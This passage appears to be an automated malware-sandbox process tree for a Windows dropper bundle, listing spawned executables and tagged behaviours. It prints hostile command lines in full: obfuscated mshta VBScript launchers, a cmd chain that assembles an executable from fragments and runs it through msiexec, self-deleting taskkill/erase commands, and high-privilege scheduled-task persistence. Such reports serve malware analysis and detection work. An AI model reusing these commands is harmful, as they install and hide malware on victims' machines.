C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09c42cad92c20f79.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09c42cad92c20f79.exe" & exit6⤵PID:6468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09c42cad92c20f79.exe" /f7⤵
- Loads dropped DLL
- Kills process with taskkill
PID:6568
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe4⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09e95ff6b5.exeWed09e95ff6b5.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1508 -
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3164 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:3480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 2087⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3536
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1696
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe4⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe5⤵PID:2328
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
PID:3964
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09db0d52c38.exeWed09db0d52c38.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3652 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:3680
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6980
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe4⤵PID:3756
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exeWed0971f17486f8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed0971f17486f8.exe6⤵
- Executes dropped EXE
PID:752
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe4⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe5⤵
- Executes dropped EXE
PID:2420 -
C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"6⤵
- Executes dropped EXE
PID:6804
-
-
C:\Users\Admin\Pictures\Adobe Films\dmurlGBaCKit5_AqkRehxJL_.exe"C:\Users\Admin\Pictures\Adobe Films\dmurlGBaCKit5_AqkRehxJL_.exe"6⤵PID:624
-
-
C:\Users\Admin\Pictures\Adobe Films\Ux7B70MQMWMvzY_raGDAzZ3z.exe"C:\Users\Admin\Pictures\Adobe Films\Ux7B70MQMWMvzY_raGDAzZ3z.exe"6⤵
- Checks whether UAC is enabled
PID:3844
-
-
C:\Users\Admin\Pictures\Adobe Films\kcExKQ_JENbuxghog6E6BUJb.exe"C:\Users\Admin\Pictures\Adobe Films\kcExKQ_JENbuxghog6E6BUJb.exe"6⤵PID:4680
-
-
C:\Users\Admin\Pictures\Adobe Films\PpZycQHNdq11TTqAPAUEHirn.exe"C:\Users\Admin\Pictures\Adobe Films\PpZycQHNdq11TTqAPAUEHirn.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
PID:6492 -
C:\Windows\SysWOW64\svchost.exesvchost.exe7⤵PID:4848
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv7⤵PID:5148
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:4904
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv9⤵PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e9⤵PID:6156
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e10⤵PID:2432
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e12⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e13⤵PID:6828
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e14⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e15⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e16⤵PID:3204
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e17⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e18⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e19⤵PID:8736
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e20⤵PID:9116
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e21⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e22⤵PID:4392
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e23⤵PID:8220
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e24⤵PID:8524
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e25⤵PID:8900
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e26⤵
- Executes dropped EXE
PID:4680 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e27⤵PID:6624
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e28⤵PID:7236
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e29⤵PID:7732
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e30⤵PID:6232
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e31⤵PID:9576
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e32⤵PID:10056
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e33⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e34⤵PID:9960
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e35⤵PID:10168
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e36⤵PID:8524
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e37⤵PID:10188
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e38⤵
- Checks whether UAC is enabled
PID:10056
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.19⤵
- Runs ping.exe
PID:3560
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WpFILx0yw_EK8MsdJAiKhmLH.exe"C:\Users\Admin\Pictures\Adobe Films\WpFILx0yw_EK8MsdJAiKhmLH.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1048
-
-
C:\Users\Admin\Pictures\Adobe Films\a4hC89JjzvN7O07q6G1UDT5s.exe"C:\Users\Admin\Pictures\Adobe Films\a4hC89JjzvN7O07q6G1UDT5s.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:6548 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵PID:3160
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:7124
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"6⤵PID:5748
-
C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"7⤵PID:5756
-
C:\Users\Admin\Pictures\Adobe Films\w9f17aiZVejBtcEeY2Ur_rNz.exe"C:\Users\Admin\Pictures\Adobe Films\w9f17aiZVejBtcEeY2Ur_rNz.exe"8⤵PID:4548
-
-
C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe"C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe"8⤵PID:5876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pigw4o1F_L8sTypvXVcqtG_B.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\pigw4o1F_L8sTypvXVcqtG_B.exe" & exit9⤵PID:8664
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pigw4o1F_L8sTypvXVcqtG_B.exe" /f10⤵
- Kills process with taskkill
PID:7156
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\60A6aqKHTLVp0Tkaq2_va_4E.exe"C:\Users\Admin\Pictures\Adobe Films\60A6aqKHTLVp0Tkaq2_va_4E.exe"8⤵PID:6072
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:7704
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:8576
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lnVxn988besVrZFIvNw5A_yc.exe"C:\Users\Admin\Pictures\Adobe Films\lnVxn988besVrZFIvNw5A_yc.exe"8⤵PID:3900
-
-
C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"8⤵
- Checks whether UAC is enabled
PID:6828 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
- Checks whether UAC is enabled
PID:7312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\CGDdIXA0PUg531oqccqn7mSz.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:8056
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
- Checks whether UAC is enabled
PID:8724 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
- Checks whether UAC is enabled
PID:6540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:5752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:5756
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
- Checks whether UAC is enabled
PID:9068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:8572
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:8688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:8420
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵PID:9756
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "CGDdIXA0PUg531oqccqn7mSz.exe"11⤵
- Kills process with taskkill
PID:9024
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\A_qRk2V7YReO1inhr9jfoyoT.exe"C:\Users\Admin\Pictures\Adobe Films\A_qRk2V7YReO1inhr9jfoyoT.exe"8⤵PID:4604
-
-
C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"8⤵PID:8020
-
C:\Users\Admin\AppData\Local\Temp\is-6CPKU.tmp\JaiWjlrNxwqygP7FOh0EGpEb.tmp"C:\Users\Admin\AppData\Local\Temp\is-6CPKU.tmp\JaiWjlrNxwqygP7FOh0EGpEb.tmp" /SL5="$503CC,506127,422400,C:\Users\Admin\Pictures\Adobe Films\JaiWjlrNxwqygP7FOh0EGpEb.exe"9⤵
- Checks whether UAC is enabled
PID:8092 -
C:\Users\Admin\AppData\Local\Temp\is-B3O6B.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-B3O6B.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
PID:8384 -
C:\Users\Admin\AppData\Local\Temp\20-4ab5d-2b0-57994-b23f301dd3a34\Cezhenipoly.exe"C:\Users\Admin\AppData\Local\Temp\20-4ab5d-2b0-57994-b23f301dd3a34\Cezhenipoly.exe"11⤵
- Checks whether UAC is enabled
PID:9072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exe /eufive & exit12⤵PID:7160
-
C:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\f32n3gef.par\GcleanerEU.exe /eufive13⤵PID:9900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exeC:\Users\Admin\AppData\Local\Temp\mhk1kv4s.3y2\installer.exe /qn CAMPAIGN="654"13⤵
- Checks whether UAC is enabled
PID:10008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe & exit12⤵PID:9316
-
C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exeC:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe13⤵PID:10152
-
C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe"C:\Users\Admin\AppData\Local\Temp\p0siz5q1.o5q\any.exe" -u14⤵PID:8072
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exe /mixfive & exit12⤵PID:9460
-
C:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\oeub0ekd.fww\gcleaner.exe /mixfive13⤵PID:3804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x01bzai5.sl1\autosubplayer.exe /S & exit12⤵PID:9592
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1pGCk9JuFtSvaX509uJfKOjK.exe"C:\Users\Admin\Pictures\Adobe Films\1pGCk9JuFtSvaX509uJfKOjK.exe"8⤵PID:4244
-
-
C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"8⤵PID:5016
-
C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe"C:\Users\Admin\Pictures\Adobe Films\3xJx1miQRwc72ZNWocUfVf7j.exe" -u9⤵PID:9180
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:4204
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tTFv5eumajuqhmuOdEfEaVku.exe"C:\Users\Admin\Pictures\Adobe Films\tTFv5eumajuqhmuOdEfEaVku.exe"6⤵
- Suspicious use of SetThreadContext
PID:4772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:1768
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1764
-
-
C:\Users\Admin\Pictures\Adobe Films\JaBAfvNQWyTQv4y21uCa2GjT.exe"C:\Users\Admin\Pictures\Adobe Films\JaBAfvNQWyTQv4y21uCa2GjT.exe"6⤵PID:5036
-
-
C:\Users\Admin\Pictures\Adobe Films\kr1MTXrrJeOVGwkqvX73FOK7.exe"C:\Users\Admin\Pictures\Adobe Films\kr1MTXrrJeOVGwkqvX73FOK7.exe"6⤵PID:6208
-
-
C:\Users\Admin\Pictures\Adobe Films\E_Nmun5chv0A0riFQzxLehHf.exe"C:\Users\Admin\Pictures\Adobe Films\E_Nmun5chv0A0riFQzxLehHf.exe"6⤵PID:6228
-
-
C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
PID:6004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe" & del C:\ProgramData\*.dll & exit7⤵PID:2468
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f8⤵
- Kills process with taskkill
PID:7016
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:8204
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"6⤵
- Suspicious use of SetThreadContext
PID:2288 -
C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"C:\Users\Admin\Pictures\Adobe Films\0hp5lI2f2FoyQfBIrXA9ES2X.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4056
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"6⤵PID:2852
-
-
C:\Users\Admin\Pictures\Adobe Films\lRmUa61K9ejJsyIOahAhHjo_.exe"C:\Users\Admin\Pictures\Adobe Films\lRmUa61K9ejJsyIOahAhHjo_.exe"6⤵PID:7040
-
-
C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"6⤵
- Suspicious use of SetThreadContext
PID:4880 -
C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"C:\Users\Admin\Pictures\Adobe Films\z4HyLiMdE8kxdxosrFQYODgR.exe"7⤵PID:6308
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4736
-
-
C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"6⤵PID:7076
-
-
C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"6⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\is-S7VFE.tmp\U_tSRTpe9iuHA7rySgKJYnb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-S7VFE.tmp\U_tSRTpe9iuHA7rySgKJYnb3.tmp" /SL5="$40466,506127,422400,C:\Users\Admin\Pictures\Adobe Films\U_tSRTpe9iuHA7rySgKJYnb3.exe"7⤵
- Loads dropped DLL
- Checks whether UAC is enabled
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\is-VBE8F.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-VBE8F.tmp\DYbALA.exe" /S /UID=27108⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6452 -
C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe" /VERYSILENT9⤵
- Checks whether UAC is enabled
PID:7772
-
-
C:\Users\Admin\AppData\Local\Temp\a0-34a9d-71c-da1b4-dc85398404dfc\Jocaezhagiba.exe"C:\Users\Admin\AppData\Local\Temp\a0-34a9d-71c-da1b4-dc85398404dfc\Jocaezhagiba.exe"9⤵
- Checks computer location settings
PID:8584
-
-
C:\Users\Admin\AppData\Local\Temp\4b-61723-008-691af-93ff11a02b320\Culaqaecijy.exe"C:\Users\Admin\AppData\Local\Temp\4b-61723-008-691af-93ff11a02b320\Culaqaecijy.exe"9⤵
- Checks whether UAC is enabled
PID:6408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exe /eufive & exit10⤵PID:4808
-
C:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rfgsghgv.3oe\GcleanerEU.exe /eufive11⤵PID:8904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:7876
-
C:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exeC:\Users\Admin\AppData\Local\Temp\zl5shdpj.rx5\installer.exe /qn CAMPAIGN="654"11⤵
- Checks whether UAC is enabled
- Enumerates connected drives
- Modifies system certificate store
PID:8948 -
